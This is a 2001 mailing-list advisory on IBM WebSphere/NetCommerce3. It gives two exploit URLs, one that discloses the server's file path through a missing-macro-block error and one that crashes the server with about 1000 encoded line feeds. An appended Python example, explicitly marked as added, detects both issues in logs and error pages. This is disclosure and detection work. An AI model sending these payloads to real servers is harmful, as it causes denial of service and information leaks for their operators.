[LoWNOISE] IBM Websphere/NetCommerce3 DoS and one more.

From: ET LoWNOISE (etat_private)
Date: Thu Apr 12 2001 - 21:28:48 PDT

    PRODUCT:  IBM Websphere/NetCommerce3
    VERSION:  3.1.2, possibly others (Unix, and NT)
    
    +PATH REVEALING PROBLEM
    Exploit:
    
    http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
    
    Result:
    
    DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
     in file /usr/NetCommerce3/macros/en_US/macro.d2w
    
    +DoS with Long URL
    Exploit:
    
    http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(approx 1000)..%0a
    
    On UNIX and NT, NetCommerce will crash:
      Server Not Responding
    
    [-----------------------------------------------------------------------]
    
    Efrain 'ET' Torres
    etat_private
    [LoWNOISE] Colombia 2001
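
Added example, not part of the original post: a defender-side check for both issues reported above, flagging ExecMacro requests whose HTML block name carries an abnormal run of encoded line feeds and extracting the server path leaked by a DTWP029E error page. The Common Log Format layout, the threshold of 50, the HTTP status values and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# URL prefix as given in the advisory; group 1 = macro file, group 2 = HTML block name.
EXEC_MACRO = re.compile(r"^/cgi-bin/ncommerce3/ExecMacro/([^/]+)/(.*)$", re.I)
# Net.Data error text quoted in the advisory; group 1 = disclosed server path.
DTWP029E = re.compile(r"DTWP029E:.*?in file\s+(\S+)", re.S)
# Request and status fields of a Common Log Format line (assumed log format).
CLF_REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
NEWLINE_THRESHOLD = 50  # assumption: tune to local traffic

def newline_count(path):
    """Count decoded line feeds in the HTML block part of an ExecMacro URL."""
    m = EXEC_MACRO.match(path)
    return unquote(m.group(2)).count("\n") if m else 0

def disclosed_path(body):
    """Return the filesystem path leaked by a DTWP029E error page, or None."""
    m = DTWP029E.search(body)
    return m.group(1) if m else None

def scan_log(lines):
    """Return (line_number, newline_count, status) for suspicious requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CLF_REQUEST.search(line)
        if not m:
            continue
        count = newline_count(m.group(1))
        if count >= NEWLINE_THRESHOLD:
            hits.append((n, count, int(m.group(2))))
    return hits

# Constructed sample data (192.0.2.0/24 is a documentation address range).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2001:21:00:01 -0700] "GET /cgi-bin/ncommerce3/ExecMacro/macro.d2w/report HTTP/1.0" 200 5120',
    '192.0.2.77 - - [12/Apr/2001:21:00:09 -0700] "GET /cgi-bin/ncommerce3/ExecMacro/macro.d2w/' + "%0a" * 1000 + ' HTTP/1.0" 500 0',
    '192.0.2.10 - - [12/Apr/2001:21:00:15 -0700] "GET /index.html HTTP/1.0" 200 300',
]
SAMPLE_BODY = ("DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK\n"
               " in file /usr/NetCommerce3/macros/en_US/macro.d2w")

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
    print(disclosed_path(SAMPLE_BODY))
```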
    


